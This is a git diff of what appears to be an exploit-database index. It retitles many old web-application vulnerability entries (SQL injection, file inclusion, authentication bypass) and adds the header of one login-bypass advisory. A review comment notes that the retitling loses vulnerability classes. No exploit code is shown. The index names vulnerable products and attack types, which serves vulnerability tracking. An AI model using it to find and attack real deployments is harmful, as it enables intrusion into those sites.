diff --git a/files.csv b/files.csv
index bb964c279..9dc3579e1 100644
--- a/files.csv
+++ b/files.csv
@@ -16877,7 +16877,7 @@ id,file,description,date,author,platform,type,port
 2681,platforms/php/webapps/2681.txt,"QnECMS 2.5.6 - (adminfolderpath) Remote File Inclusion",2006-10-30,K-159,php,webapps,0
 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
 2684,platforms/asp/webapps/2684.txt,"Techno Dreams Guestbook 1.0 - (key) SQL Injection",2006-10-30,ajann,asp,webapps,0
-2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - (includes/common.php) Remote Code Execution",2006-10-30,Kacper,php,webapps,0
+2685,platforms/php/webapps/2685.php,"Nitrotech 0.0.3a - Remote Code Execution",2006-10-30,Kacper,php,webapps,0
 2686,platforms/php/webapps/2686.php,"phpBB Spider Friendly Module 1.3.10 - File Inclusion",2006-10-30,Kacper,php,webapps,0
 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0
 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusion",2006-10-30,v1per-haCker,php,webapps,0
@@ -18989,7 +18989,7 @@ id,file,description,date,author,platform,type,port
 5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0
 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
-5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
+5836,platforms/php/webapps/5836.txt,"Basic-CMS - SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0
 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0
 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0
@@ -20001,47 +20001,47 @@ id,file,description,date,author,platform,type,port
 7141,platforms/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps,0
 7143,platforms/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps,0
 7144,platforms/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Parameter Blind SQL Injection",2008-11-17,ZoRLu,php,webapps,0
-7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - (Authentication Bypass) SQL Injection",2008-11-17,d3b4g,php,webapps,0
-7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
+7146,platforms/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps,0
+7147,platforms/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
 7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' Parameter SQL Injection",2008-11-17,eek,php,webapps,0
 7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
 7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps,0
 7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Parameter Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
-7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - (API_HOME_DIR) Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
+7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Parameter Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps,0
 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
 7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps,0
 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusion",2008-11-19,StAkeR,php,webapps,0
-7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - (notes send) SQL Injection",2008-11-19,cOndemned,php,webapps,0
+7160,platforms/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps,0
 7162,platforms/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps,0
-7163,platforms/php/webapps/7163.txt,"RevSense - (Authentication Bypass) SQL Injection",2008-11-19,d3b4g,php,webapps,0
+7163,platforms/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps,0
 7164,platforms/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps,0
 7165,platforms/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps,0
-7166,platforms/php/webapps/7166.txt,"AskPert - (Authentication Bypass) SQL Injection",2008-11-19,TR-ShaRk,php,webapps,0
+7166,platforms/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,php,webapps,0
 7168,platforms/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps,0
 7170,platforms/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing Exploit",2008-11-20,G4N0K,php,webapps,0
-7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - (Authentication Bypass) SQL Injection",2008-11-20,Bl@ckbe@rD,php,webapps,0
+7172,platforms/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,php,webapps,0
 7173,platforms/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps,0
 7174,platforms/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm Exploit",2008-11-20,Mx,php,webapps,0
-7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - (Authentication Bypass) SQL Injection",2008-11-20,Stack,php,webapps,0
-7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php tourid' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
+7175,platforms/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,php,webapps,0
+7176,platforms/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,php,webapps,0
 7179,platforms/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps,0
-7180,platforms/php/webapps/7180.txt,"VCalendar - 'VCalendar.mdb' Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
-7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
-7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0
+7180,platforms/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps,0
+7182,platforms/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0
+7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' Parameter SQL Injection",2008-11-22,NoGe,php,webapps,0
 7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0
-7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
+7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps,0
 7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0
 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0
 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0
-7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0
-7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0
-7200,platforms/php/webapps/7200.txt,"PG Real Estate - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
-7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - (Authentication Bypass) SQL Injection",2008-11-23,ZoRLu,php,webapps,0
-7202,platforms/php/webapps/7202.txt,"PG Job Site - (poll_view_id) Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
+7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps,0
+7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps,0
+7200,platforms/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
+7201,platforms/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,php,webapps,0
+7202,platforms/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,php,webapps,0
 7204,platforms/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps,0
 7205,platforms/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps,0
 7206,platforms/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps,0
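Review bot: Rows 7146, 7163, 7166, 7172, 7175, 7200 and 7201 lose the vulnerability class when "(Authentication Bypass) SQL Injection" is shortened to "Authentication Bypass", so anyone filtering this index for SQL injection entries, for example to check their own deployments against it, will no longer find them. The same shortening is applied to 7248, 7254 and 7263 in the `@@ -20050` hunk and to 8635 in the `@@ -20956` hunk, and the new 40987 row is titled "Authentication Bypass" although its advisory file gives the type as "Admin login bypass via SQLi". The index already has a form that keeps both facts, row 2687 `"E Annu 1.0 - Login Bypass (SQL Injection)"`; I would follow it here, e.g. `"Simple Customer 1.2 - Authentication Bypass (SQL Injection)"`.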
@@ -20050,49 +20050,49 @@ id,file,description,date,author,platform,type,port
 7211,platforms/php/webapps/7211.php,"VideoScript 3.0 <= 4.0.1.50 - Official Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7212,platforms/php/webapps/7212.php,"VideoScript 3.0 <= 4.1.5.55 - Unofficial Shell Injection",2008-11-24,G4N0K,php,webapps,0
 7214,platforms/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps,0
-7215,platforms/php/webapps/7215.txt,"bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
-7216,platforms/php/webapps/7216.txt,"WebStudio CMS - 'index.php pageid' Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
+7215,platforms/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps,0
+7216,platforms/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps,0
 7217,platforms/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps,0
-7218,platforms/php/webapps/7218.txt,"nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
+7218,platforms/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps,0
 7221,platforms/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusion",2008-11-24,NoGe,php,webapps,0
-7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
-7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
-7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0
+7222,platforms/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
+7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0
+7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps,0
 7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
 7227,platforms/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
 7228,platforms/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps,0
-7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
-7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - (full_txt.php id) Blind SQL Injection",2008-11-25,JosS,php,webapps,0
+7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0
+7230,platforms/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,php,webapps,0
 7231,platforms/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps,0
-7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - (simpleBlog.mdb) Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
+7232,platforms/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps,0
 7233,platforms/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps,0
-7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
-7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - (show_emp) Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
-7236,platforms/php/webapps/7236.txt,"WebStudio CMS - (pageid) Blind SQL Injection (mil mixup)",2008-11-26,"BorN To K!LL",php,webapps,0
+7234,platforms/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps,0
+7235,platforms/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps,0
+40987,platforms/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps,0
 7237,platforms/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps,0
 7238,platforms/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection",2008-11-26,XaDoS,php,webapps,0
-7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
+7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
-7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
+7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
 7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
 7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
-7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0
-7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0
+7248,platforms/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,php,webapps,0
+7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps,0
 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0
 7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0
-7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
+7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
-7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - 'id' SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
+7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0
 7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0
 7259,platforms/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps,0
 7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
-7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
-7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
+7261,platforms/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
+7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0
 7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
@@ -20181,7 +20181,7 @@ id,file,description,date,author,platform,type,port
 7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0
 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0
-7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - (Natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
+7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0
@@ -20956,7 +20956,7 @@ id,file,description,date,author,platform,type,port
 8622,platforms/php/webapps/8622.pl,"webSPELL 4.2.0e - (page) Blind SQL Injection",2009-05-07,DNX,php,webapps,0
 8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0
 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0
-8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0
+8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps,0
 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0
 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0
 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0
@@ -21504,7 +21504,7 @@ id,file,description,date,author,platform,type,port
 9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
 9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0
 9510,platforms/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0
-9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
+9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
 40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
 9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0
@@ -22107,7 +22107,7 @@ id,file,description,date,author,platform,type,port
 10790,platforms/php/webapps/10790.txt,"Joomla! Component com_kkcontent - Blind SQL Injection",2009-12-29,Pyske,php,webapps,0
 10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - (admin) Local File Inclusion",2009-12-30,cr4wl3r,php,webapps,0
-10794,platforms/asp/webapps/10794.txt,"WEB Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
+10794,platforms/asp/webapps/10794.txt,"Web Calendar - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
 10795,platforms/asp/webapps/10795.txt,"ezguestbook - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
 10796,platforms/asp/webapps/10796.txt,"ezscheduler - Remote Database Disclosure",2009-12-30,RENO,asp,webapps,0
 10798,platforms/php/webapps/10798.txt,"iDevAffiliate 4.0 - Backup",2009-12-30,indoushka,php,webapps,0
@@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port
 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showproduct.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
-23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
+23653,platforms/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0
 23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0
 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0
 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0
@@ -28772,7 +28772,7 @@ id,file,description,date,author,platform,type,port
 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0
 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 - PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0
 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 - Item.pl Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0
-27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
+27083,platforms/asp/webapps/27083.txt,"SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0
 27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
 27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 - addcomment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
 27086,platforms/php/webapps/27086.txt,"White Album 2.5 - Pictures.php SQL Injection",2006-01-16,liz0,php,webapps,0
diff --git a/platforms/php/webapps/40987.txt b/platforms/php/webapps/40987.txt
new file mode 100755
index 000000000..34fe82008
--- /dev/null
+++ b/platforms/php/webapps/40987.txt
@@ -0,0 +1,12 @@
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+[x] Type: Admin login bypass via SQLi
+[x] Vendor: http://software.friendsinwar.com/
+[x] Script Name: My Click Counter
+[x] Script Version: 1.0
+[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
+[x] Author: AnarchyAngel AKA Adam
+[x] Mail : anarchy[dot]ang31@gmail[dot]com
